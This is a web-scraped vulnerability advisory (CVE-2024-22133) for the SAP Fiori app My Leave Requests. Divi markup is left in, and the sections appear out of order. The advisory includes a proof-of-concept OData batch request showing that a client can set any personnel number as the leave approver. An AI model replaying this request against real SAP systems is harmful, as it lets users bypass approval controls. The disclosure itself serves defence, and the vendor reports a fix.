[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.0\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n
Advisory ID<\/strong>: usd-2023-0042 SAP Fiori Applikation My Leave Requests (Version 3\/Fiori 2.0) Leave requests can be submitted via the application. The respective supervisor is stored as the approver, who cannot be changed via the front end.<\/p>\n Via the OData backend API call, which is sent as soon as a leave request is sent, any other employee can be set as the approver.<\/p>\n During a leave request, the following request will be sent to the OData backend:<\/p>\n <\/p>\n --batch_ee60-88db-eb95<\/p>\n Content-Type: multipart\/mixed; boundary=changeset_4f6a-f52d-09f8<\/p>\n --changeset_4f6a-f52d-09f8<\/p>\n Content-Type: application\/http POST LeaveRequestSet?sap-client=001 HTTP\/1.1 { --changeset_4f6a-f52d-09f8--<\/p>\n --batch_ee60-88db-eb95--<\/p>\n<\/div>\n <\/p>\n As can be seen in line 28, the approver is also sent by the client. This means that any other personnel number can be set as the approver. If the own personnel number is set, the leave request will be created correctly. However, it is not possible to approve the leave request yourself. However, as already mentioned, each personnel number can be specified by another person who can then approve the application.<\/p>\n It is recommended to restrict access to sensitive functions or information by default. Required access privileges should be granted explicitly by a global access control mechanism. Furthermore, the approver should not be manipulable by the client<\/p>\n https:\/\/cwe.mitre.org\/data\/definitions\/284.html<\/a><\/p>\n
Product<\/strong>: SAP Fiori - My Leave Requests (Version 3\/Fiori 2.0)
Affected Version<\/strong>: Component: GBX01HR5 605 0020, Support Package: SAPK-60520INGBX01HR5
Vulnerability Type<\/strong>: CWE-284: Improper Access Control
Security Risk<\/strong>: CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:N\/VI:L\/VA:N\/SC:N\/SI:N\/SA:N (Medium)
Vendor URL<\/strong>: https:\/\/www.sap.com<\/a>
Vendor Acknowledged Vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2024-22133
CVE Link<\/strong>: CVE-2024-22133<\/a><\/p>\nAffected Component(s)<\/h3>\n
https:\/\/fioriappslibrary.hana.ondemand.com\/sap\/fix\/externalViewer\/#\/detail\/Apps('F1311A')\/W38<\/a><\/p>\nDesciption<\/h3>\n
Proof of Concept<\/h3>\n
<\/span>POST<\/span> \/sap\/opu\/odata\/sap\/HCMFAB_LEAVE_REQUEST_CR_SRV\/$batch?sap-client=001<\/span> HTTP<\/span>\/<\/span>2
<\/span>Host<\/span>:<\/span> <sap-fiori-host>
<\/span>
[...]<\/span><\/pre>\n
Content-Transfer-Encoding: binary<\/p>\n
Content-Type: application\/jsonsap-context
id-accept: header
Accept: application\/json
x-csrf-token: GArPMRDcc1-LL4y1wfsAIA==
Accept-Language: en
DataServiceVersion: 2.0
MaxDataServiceVersion: 2.0
Content-Length: 375<\/p>\n
\"StartDate\":\"\\\/Date(1702252800000)\\\/\",\"EndDate\":\"\\\/Date(1702252800000)\\\/\",\"StartTime\":\"\",\"EndTime\":\"\",
\"__metadata\":{\"type\":\"HCMFAB_LEAVE_REQUEST_CR_SRV.LeaveRequest\"},
\"EmployeeID\":\"00204915\",\"AbsenceTypeName\":\"Urlaub\",\"AbsenceTypeCode\":\"0100\",
\"ApproverLvl1\":{\"Name\":\"<ApproverName>\",\"Pernr\":\"00204914\",\"Seqnr\":\"001\",\"DefaultFlag\":false},
\"Notes\":\"\",\"IsMultiLevelApproval\":false
}<\/p>\nFix<\/h3>\n
References<\/h3>\n
Timeline<\/h3>\n